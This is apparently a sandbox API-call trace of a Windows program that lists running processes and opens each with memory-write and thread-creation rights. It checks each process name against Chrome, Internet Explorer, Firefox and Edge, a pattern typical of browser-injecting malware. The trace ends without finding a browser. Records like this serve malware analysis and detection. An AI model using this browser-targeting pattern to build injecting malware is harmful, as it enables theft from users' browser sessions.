	[0254.591] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0254.592] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0254.593] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0254.593] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xac98
	[0254.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.594] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0254.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.594] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.594] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0254.595] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.595] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.595] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0254.596] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xac9c
	[0254.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.596] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0254.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.596] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.597] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.597] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0254.597] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.597] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.597] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0254.598] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xaca0
	[0254.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.598] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0254.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.598] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.599] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0254.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.599] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.599] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0254.600] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xaca4
	[0254.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.600] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0254.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.601] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.601] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0254.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.601] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.601] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0254.602] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xaca8
	[0254.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.602] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0254.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.603] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.603] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0254.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.603] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.603] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0254.604] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xacac
	[0254.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.604] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0254.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.605] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.605] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0254.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.606] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.606] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0254.606] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xacb0
	[0254.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.607] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0254.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.607] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.607] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0254.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.608] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.608] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0254.608] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xacb4
	[0254.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.609] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0254.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.609] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.609] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0254.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.609] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.610] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.610] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xacb8
	[0254.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.611] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.611] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.611] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.612] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.612] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.612] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xacbc
	[0254.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.613] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.613] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.613] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.614] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.614] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.615] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xacc0
	[0254.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.615] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.615] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.615] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.616] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.616] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.617] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xacc4
	[0254.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.617] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.617] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.618] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.618] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.618] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.618] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.618] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.619] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xacc8
	[0254.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.619] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.619] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.620] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.620] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.620] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.621] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xaccc
	[0254.621] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.621] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.621] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.621] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.622] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.622] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.622] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.623] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xacd0
	[0254.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.624] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.624] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.625] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.625] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.625] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0254.626] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xacd4
	[0254.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.626] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0254.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.627] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.627] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0254.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.627] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.627] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.628] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xacd8
	[0254.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.628] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.629] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.629] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.629] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.630] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0254.630] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xacdc
	[0254.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.630] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.631] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.631] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.631] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.632] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0254.632] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xace0
	[0254.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.643] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0254.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.644] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.644] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0254.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.645] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.645] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.646] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xace4
	[0254.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.646] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.646] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.646] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.647] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.647] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0254.648] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xace8
	[0254.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.648] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0254.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.648] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.649] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.649] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0254.649] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.649] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.649] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0254.650] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xacec
	[0254.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.650] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0254.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.651] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.651] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0254.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.651] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.652] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0254.652] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xacf0
	[0254.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.653] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0254.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.653] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.653] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0254.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.653] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.654] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0254.654] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xacf4
	[0254.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.655] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0254.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.655] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.655] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0254.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.656] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.656] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0254.657] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
